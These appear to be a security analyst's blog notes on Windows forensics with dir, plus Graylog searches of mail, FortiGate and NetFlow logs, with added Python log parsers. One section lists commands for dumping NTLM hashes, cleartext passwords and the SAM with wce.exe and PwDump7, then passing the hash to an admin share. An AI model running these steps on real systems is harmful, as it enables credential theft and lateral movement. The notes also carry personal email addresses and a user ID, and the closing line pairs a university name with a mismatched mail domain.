Thursday, 28 September 2017

Using dir to find suspicious files

method 1 (dir piped to find)

 dir /tc malware
2017/01/01  下午 01:32  malware

/tc shows the creation timestamp (the NTFS $STANDARD_INFORMATION value). Malware that timestomps its files will show a false value here, so treat it as a lead, not proof.

dir /a  /s /tc /od c:\ | find "2017/01/01  下午 01:3"   (time range: everything created between 01:30 and 01:39 PM; 下午 is the zh-TW locale's PM marker)

find does a literal, case-sensitive substring match, so the quoted text must reproduce dir's output exactly: two spaces between the date and the time, and the same date order and AM/PM marker the host's locale prints (an en-US host prints 01/01/2017  01:32 PM). Use find /i if case needs to be ignored.

dir /a  /s /tc /o-d c:\windows\system32 |more   (all attributes including hidden and system, newest creation time first)
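Added example (not from the original post): a Python parser for captured `dir /a /s /tc` output that selects files by creation-time window instead of a literal `find` string, so the match no longer depends on exact spacing or on the locale's AM/PM marker. The listing it parses is constructed for the example (zh-TW locale format, invented names and sizes); `parse_dir_listing` and `find_created_between` are this example's own names.

```python
import re
from datetime import datetime

# Constructed sample of "dir /a /s /tc" output from a zh-TW Windows host
# (上午 = AM, 下午 = PM, date printed as yyyy/mm/dd). Names and sizes are
# invented for this example; "malware" and its time match the page's note.
SAMPLE_DIR_OUTPUT = r"""
 c:\temp 的目錄

2017/01/01  下午 01:32    <DIR>          .
2017/01/01  下午 01:32    <DIR>          ..
2017/01/01  下午 01:32            45,056 malware
2016/12/20  上午 09:15             1,024 notes.txt

 c:\windows\system32 的目錄

2017/01/01  下午 01:35            12,288 svchosts.exe
2015/07/10  上午 11:59         1,500,000 kernel32.dll
"""

# "Directory of X" header: zh-TW prints " X 的目錄", en-US prints " Directory of X".
DIR_HEADER = re.compile(r"^\s*(?:Directory of\s+(?P<en>.+?)|(?P<zh>.+?) 的目錄)\s*$")

# One entry: yyyy/mm/dd date, an AM/PM marker either before (zh-TW) or after
# (en-US) the time, then <DIR> or a size with thousands separators, then the name.
ENTRY = re.compile(
    r"^(?P<date>\d{4}/\d{2}/\d{2})\s+"
    r"(?:(?P<ampm_pre>上午|下午)\s+)?"
    r"(?P<time>\d{1,2}:\d{2})"
    r"(?:\s+(?P<ampm_post>AM|PM))?\s+"
    r"(?P<size><DIR>|[\d,]+)\s+"
    r"(?P<name>.+?)\s*$"
)


def _to_datetime(date, time, ampm):
    """Combine dir's date, hh:mm and AM/PM marker (either locale) into a datetime."""
    hour, minute = (int(x) for x in time.split(":"))
    if ampm in ("下午", "PM") and hour != 12:
        hour += 12
    elif ampm in ("上午", "AM") and hour == 12:
        hour = 0
    return datetime.strptime(date, "%Y/%m/%d").replace(hour=hour, minute=minute)


def _as_datetime(value):
    """Window bounds may be datetimes or 'yyyy/mm/dd HH:MM' strings (24-hour clock)."""
    if isinstance(value, datetime):
        return value
    return datetime.strptime(value, "%Y/%m/%d %H:%M")


def parse_dir_listing(text):
    """Yield (creation_time, full_path, is_dir) for every entry in a dir /s listing."""
    current_dir = None
    for line in text.splitlines():
        header = DIR_HEADER.match(line)
        if header:
            current_dir = header.group("en") or header.group("zh")
            continue
        entry = ENTRY.match(line)
        if not entry or entry.group("name") in (".", ".."):
            continue
        created = _to_datetime(entry.group("date"), entry.group("time"),
                               entry.group("ampm_pre") or entry.group("ampm_post"))
        path = (current_dir or "").rstrip("\\") + "\\" + entry.group("name")
        yield created, path, entry.group("size") == "<DIR>"


def find_created_between(text, start, end):
    """Files (directories excluded) whose creation time lies in [start, end]."""
    start, end = _as_datetime(start), _as_datetime(end)
    return [(created, path) for created, path, is_dir in parse_dir_listing(text)
            if not is_dir and start <= created <= end]


if __name__ == "__main__":
    for created, path in find_created_between(SAMPLE_DIR_OUTPUT,
                                              "2017/01/01 13:30", "2017/01/01 13:39"):
        print(created.isoformat(sep=" "), path)
```

Redirect `dir /a /s /tc c:\ > listing.txt` on the suspect host and run the parser offline; only the `DIR_HEADER` and `ENTRY` patterns need adjusting for a host whose locale prints dates or the AM/PM marker differently.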

*************************************************
use wce.exe and PwDump7.exe

wce.exe        (no switch: list the logon sessions on this host and their NTLM hashes)
wce.exe -w     (dump cleartext passwords held in memory)

PwDump7.exe    (dump the local SAM; one line per account, user:RID:LMhash:NThash:::)
Administrator:500:xxxx

wce.exe -s Administrator:test:xxxx    (-s <user>:<domain>:<LMhash>:<NThash> replaces the NTLM credentials of the current logon session with the dumped hash; nothing is cracked)

net use \\test\c$    (the SMB connection now authenticates with the injected hash: pass-the-hash to the admin share)

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

We have developed a new password dumper for Windows named PWDUMP7. The main difference between pwdump7 and other pwdump tools is that it extracts the binary SAM and SYSTEM files directly from the filesystem and then extracts the hashes from them; for that task the Rkdetector NTFS and FAT32 filesystem drivers are used.

Pwdump 7 for Windows
Pwdump7 is also able to extract passwords offline by selecting the target files.


*************************************************
cfc.exe is CompFileChecker, a file-comparison tool by H.KINOSHITA (version 0.0.2.0, 609,792 bytes).

cfc.exe algx.exe c:\windows\winhelp.exe    (compare the two files)



Wednesday, 13 September 2017

Graylog / Splunk: searching by user keyword

******************************************************
mail log keyword search

search keyword:
"zxcv2020123@outlook.com" AND source:mg

message
mg postfix/cleanup[5592]: 08BBE132: warning: header Subject:? =?gb2312?B?1sK437LNtPPIq9Cj0KOE1c6vhlSjrNPQ6lDQo4TVlf7XaNDCyM7Qo+lM33g=?=? =?gb2312?B?xWWV/tdo1vfPr7C4?= from mail-db8eur05olkn2075.outbound.protection.outlook.com[40.92.89.75]; from=<zxcv2020123@outlook.com> to=<ej@mail.nkuht.edu.tw> proto=ESMTP helo=<EUR05-DB8-obe.outbound.protection.outlook.com>
source
mg
timestamp

2019-12-30T08:50:51.000Z
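Added example, not part of the original notes: parsing the postfix/cleanup warning above into fields and decoding the RFC 2047 encoded Subject so the phishing subject line is readable. The log line is copied from the page; `parse_cleanup_warning`, `decode_subject` and the field names are this example's own. The "?" characters in the logged header are how postfix prints the control characters (tab, newline) that folded the Subject, so the decoder pulls the encoded-words out rather than feeding the raw value to the email library.

```python
import re
from email.header import decode_header

# The postfix/cleanup warning from the page, joined into a single syslog line.
SAMPLE_LINE = (
    "mg postfix/cleanup[5592]: 08BBE132: warning: header Subject:? "
    "=?gb2312?B?1sK437LNtPPIq9Cj0KOE1c6vhlSjrNPQ6lDQo4TVlf7XaNDCyM7Qo+lM33g=?=? "
    "=?gb2312?B?xWWV/tdo1vfPr7C4?= "
    "from mail-db8eur05olkn2075.outbound.protection.outlook.com[40.92.89.75]; "
    "from=<zxcv2020123@outlook.com> to=<ej@mail.nkuht.edu.tw> proto=ESMTP "
    "helo=<EUR05-DB8-obe.outbound.protection.outlook.com>"
)

# Fields of a cleanup header warning: the logged header value runs up to
# " from <client>[<ip>];", followed by envelope sender/recipient and HELO.
CLEANUP_RE = re.compile(
    r"(?P<host>\S+) postfix/cleanup\[\d+\]: (?P<queue_id>[0-9A-F]+): warning: "
    r"header (?P<header>[^:]+):(?P<value>.*?) "
    r"from (?P<client>\S+)\[(?P<client_ip>[^\]]+)\]; "
    r"from=<(?P<sender>[^>]*)> to=<(?P<recipient>[^>]*)> "
    r"proto=(?P<proto>\S+) helo=<(?P<helo>[^>]*)>"
)

# One RFC 2047 encoded-word: =?charset?B|Q?payload?=
ENCODED_WORD = re.compile(r"=\?[^?]+\?[BQbq]\?[^?]*\?=")


def decode_subject(raw_value):
    """Decode the encoded-words in a logged header value to text.

    Postfix replaced the folding whitespace with '?', so extract the words and
    re-join them with a space before handing them to email.header. Mail labelled
    gb2312 is routinely GBK in practice, so decode with the GBK superset and
    never raise on a stray byte.
    """
    words = ENCODED_WORD.findall(raw_value)
    if not words:
        return raw_value.strip()
    parts = []
    for data, charset in decode_header(" ".join(words)):
        if isinstance(data, str):
            parts.append(data)
            continue
        charset = (charset or "ascii").lower()
        if charset in ("gb2312", "gbk"):
            charset = "gbk"
        parts.append(data.decode(charset, errors="replace"))
    return "".join(parts)


def parse_cleanup_warning(line):
    """Split a postfix/cleanup header warning into fields; None for any other line."""
    m = CLEANUP_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_header"] = decode_subject(rec["value"])
    return rec


if __name__ == "__main__":
    rec = parse_cleanup_warning(SAMPLE_LINE)
    for key in ("queue_id", "client_ip", "sender", "recipient", "helo", "decoded_header"):
        print(f"{key:15} {rec[key]}")
```

The Graylog query on the page (`"zxcv2020123@outlook.com" AND source:mg`) finds the line; this is what to run on it afterwards to get the sender's relay IP, the HELO name and a readable subject for the ticket.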

*************************************************
FortiGate user-authentication event (type=event subtype=user):

date=2017-09-14 time=00:27:44 devname=FG1K5D devid=FG1K5D3I15802166 logid=0102043008 type=event subtype=user level=notice vd="root" logdesc="Authentication success" srcip=192.168.202.158 dstip=192.168.250.86 policyid=0 user="A0411018" group="auth_user_group" authproto="HTTP(192.168.202.158)" action=authentication status=success reason="N/A" msg="User A0411018 succeeded in authentication"

search keyword (terms joined with AND must all match; a bare term is matched against the whole message text, so "success" also hits logdesc="Authentication success"):
192.168.202.158 AND success
192.168.12.150 AND authentication
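Added example, not from the original page: a key=value parser for the FortiGate line above plus a small AND-term matcher that mimics the two searches (bare terms are matched as case-insensitive substrings of the raw line, `field:value` terms against a parsed field). The first log line is the page's own; the two extra lines are constructed for the example and their status/reason values are illustrative, not copied from a real device. Graylog tokenizes the message rather than substring-matching, so this is a simplification of its full-text search.

```python
import re

# Sample lines: [0] is the page's FortiGate event; [1] and [2] are constructed
# (a failed attempt from the same client and a success from another client).
SAMPLE_LOGS = [
    'date=2017-09-14 time=00:27:44 devname=FG1K5D devid=FG1K5D3I15802166 logid=0102043008 type=event subtype=user level=notice vd="root" logdesc="Authentication success" srcip=192.168.202.158 dstip=192.168.250.86 policyid=0 user="A0411018" group="auth_user_group" authproto="HTTP(192.168.202.158)" action=authentication status=success reason="N/A" msg="User A0411018 succeeded in authentication"',
    'date=2017-09-14 time=00:25:10 devname=FG1K5D devid=FG1K5D3I15802166 logid=0102043008 type=event subtype=user level=notice vd="root" logdesc="Authentication failure" srcip=192.168.202.158 dstip=192.168.250.86 policyid=0 user="A0411018" group="N/A" authproto="HTTP(192.168.202.158)" action=authentication status=failed reason="Bad password" msg="User A0411018 failed in authentication"',
    'date=2017-09-14 time=00:31:02 devname=FG1K5D devid=FG1K5D3I15802166 logid=0102043008 type=event subtype=user level=notice vd="root" logdesc="Authentication success" srcip=192.168.12.150 dstip=192.168.250.86 policyid=0 user="B0512009" group="auth_user_group" authproto="HTTP(192.168.12.150)" action=authentication status=success reason="N/A" msg="User B0512009 succeeded in authentication"',
]

# key=value pairs; values are either "quoted, may contain spaces" or bare tokens.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# A query term of the form field:value (IPv4 values are fine; IPv6 would need quoting).
FIELD_TERM_RE = re.compile(r"^(\w+):(.+)$")


def parse_kv(line):
    """Turn a FortiGate key=value line into a dict, unquoting quoted values."""
    fields = {}
    for m in KV_RE.finditer(line):
        key, quoted, bare = m.group(1), m.group(2), m.group(3)
        fields[key] = quoted if quoted is not None else bare
    return fields


def matches(line, query):
    """True when every AND-joined term of the query matches the line.

    field:value compares against the parsed field (case-insensitive, exact);
    any other term is a case-insensitive substring test on the raw line.
    """
    fields = parse_kv(line)
    for term in query.split(" AND "):
        term = term.strip().strip('"')
        m = FIELD_TERM_RE.match(term)
        if m:
            key, want = m.group(1), m.group(2).strip('"')
            if fields.get(key, "").lower() != want.lower():
                return False
        elif term.lower() not in line.lower():
            return False
    return True


def search(lines, query):
    """Parsed records for the lines that satisfy the query, in input order."""
    return [parse_kv(line) for line in lines if matches(line, query)]


if __name__ == "__main__":
    for query in ("192.168.202.158 AND success",
                  "192.168.12.150 AND authentication",
                  "srcip:192.168.202.158 AND status:failed"):
        print(query)
        for rec in search(SAMPLE_LOGS, query):
            print("   ", rec["time"], rec["srcip"], rec["user"], rec["status"], rec["reason"])
```

A bare IP term also matches `dstip` and the IP embedded in `authproto`, which is why the field-qualified form (`srcip:192.168.202.158`) is the one to use when the count of hits matters.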

***************************************************
search keyword:   nf_src_address:192.168.30.148   (field:value syntax on the NetFlow source-address field, so only flows from that address match, not any message that mentions the IP)


****************************************************
Check the last 30 days of mail logs for any correspondence with National Sun Yat-sen University (hsiao@mail.nkuht.edu.tw)